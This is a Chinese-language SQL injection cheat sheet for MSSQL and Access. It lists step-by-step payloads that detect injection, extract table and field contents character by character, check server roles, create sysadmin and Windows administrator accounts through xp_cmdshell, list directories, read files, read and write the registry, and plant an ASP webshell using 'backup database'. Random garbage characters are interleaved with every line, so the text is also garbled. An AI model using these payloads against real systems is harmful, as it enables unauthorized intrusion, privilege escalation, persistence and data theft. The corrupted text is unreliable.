1.判断是否有注入;and 1=1 ;and 1=2 �DSQ2�|{ �
2.初步判断是否是mssql ;and user>0 ncqAof��(/
90#�* �el�
3.注入参数是字符'and [查询条件] and ''=' � �<2N{oK.
JR8|!Of�@B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'i',M+0>jC
/k��8��I�6
5.判断数据库系统 <?s@-�mpgN
]~2�iducB,
;and (select count(*) from sysobjects)>0 mssql �Bv<�aB(c�
[D�o���^EJ
;and (select count(*) from msysobjects)>0 access .' �}��jd#
]VL�} eHZ
Z_[ �P7�P�
\3OEC`����
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q3Pu<j}��Y
U�Rc�eq2�_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 yDfH`�]i)U
nNq<x^@83
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 l�`.z^+!8@
D&i\dg�bK�
9.(1)猜字段的ascii值(access) p[�w! SR%=
L�N~m�KoW�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 d?�&`Z��Vl
�.W^B(y(tA
(2)猜字段的ascii值(mssql) �7HkFDI()1
}f;�WY�z�5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 /{f"0]�-RA
� �D�(l�,Z
10.测试权限结构(mssql) 6@TU9AZS�`
�+j{(Nws�X
sC.�b��'1P
Q7rBc
w�m5
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- q��C�g<��g
�2TU��V9�Z
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- & ��XmaGtt
�O� 2�-n-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6#7hMQ0&;O
�md�*����U
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ����,VS(4�
1~ ��W@[D
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- bn�)1G�$0|
k:I�,$"y�4
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- OH�i.��5 (
+}O -WX?��
;and 1=(select IS_MEMBER('db_owner'));-- ���#B<EMGH
}[Z�'S�g]s
�{;DAKWm@T
gu3i��aM$W
11.添加mssql和系统的帐户 Mh*r)�B~%[
||JUP�}�eP
;exec master.dbo.sp_addlogin username;-- 4XNhe�P�;b
;exec master.dbo.sp_password null,username,password;-- x�(�._?��5
w+�/�`l�*
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- KJRAW]��?{
�& ?x���R
;exec master.dbo.xp_cmdshell 'net user username password 0S^&A�?�$=
���q�m�FG
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- tBbOxM��m0
PQDLbSe�)\
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��+=�j��S!
e�p=r7M�ft
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- :��~ pGHl�
n74\{`�8]o
rw,Y�lr�:3
])w�d�d>�'
12.(1)遍历目录 @>HT�bs�6W
i+h*�<�){X
;create table dirs(paths varchar(100), id int) �iI��{L>
<��a]i"��s
;insert dirs exec master.dbo.xp_dirtree 'c:\' LP6�����p�
i�}V��F$XN
;and (select top 1 paths from dirs)>0 �SK
l��vZ
_8�a;5��hS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) qS#G7~ur>y
c`soVqT$�?
�'|DW�#l\n
-T,?'J0� 2
(2)遍历目录 lFGuQLuqA{
&1$d`>f��n
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- r|E��N���5
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 R3~,���&ab
�B:T��s_9*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �EY��)2,��
���Z�U73UL
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 g%&E~�V/g$
>E>��y�A d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 H�EB�eJ2w
q7X�#�LY�k
@khFk.L�BD
x�"��{aO6M
13.mssql中的存储过程 SI=�$�s>1
rZKfb}A�NQ
xp_regenumvalues 注册表根键, 子键 wAKHD*��M)
f�`n4'�dG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Z^_qXerjP�
��!?nbB�2,
xp_regread 根键,子键,键值名 hyH[`w��iq
ysz� =�X�w
;exec xp_regread _K o#36�.S
V�4+�|D2��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 #RBrii-�,�
5tYo�! f��
xp_regwrite 根键,子键, 值名, 值类型, 值 _#u\ar��)
f' ?/�P~[�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��A`n>�9|R
n9'3~�q�VZ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a_RY ��Yj�
ri�Db��!oC
xp_regdeletevalue 根键,子键,值名 1��7 Ugz?
wX�KtQ#o}�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �h�q
3n�&/
Nap[��=[rv
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �=6u@�JpOl
|NuMDVd+s�
~[�HzGm%��
�C�RK%^3g�
14.mssql的backup创建webshell ;�Z]Wj9iY�
�ij
?7MP��
use model ��r{;NGQYs
y�p�#!$+a}
create table cmd(str image); 7%y$^B7{
$�ln8Cpbca
insert into cmd(str) values (''); ib�=)N)l��
lL}NiN-)t
backup database model to disk='c:\l.asp'; 'X�;cgAq8(
���(�`1i�o
=S�J#6uF�S
QQrl�dc(I
15.mssql内置函数 �8��K,X3a9
h p]J>��i.
;and (select @@version)>0 获得Windows的版本号 >Zb!?ntN`t
i g(�O$�y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k =5k)}i�
5�(��+9a �
;and (select user_name())>0 爆当前系统的连接用户 '^�UHY[mX8
� �0k
(-�
;and (select db_name())>0 得到当前连接的数据库 �Fi/�iA%�,
o-\�h;aQJ�
^��%r6+ey�
lq-KM�8j��
16.简洁的webshell &t=�:xVn-M
~*HQP�p?v
use model w"j��>^#8�
�|V a�:*3u
create table cmd(str image); �~CNB3r�5R
��@�G4���Z
insert into cmd(str) values (''); |�X�t�.[1�
�Tn&�_ >R�
backup database model to disk='g:\wwwtest\l.asp';
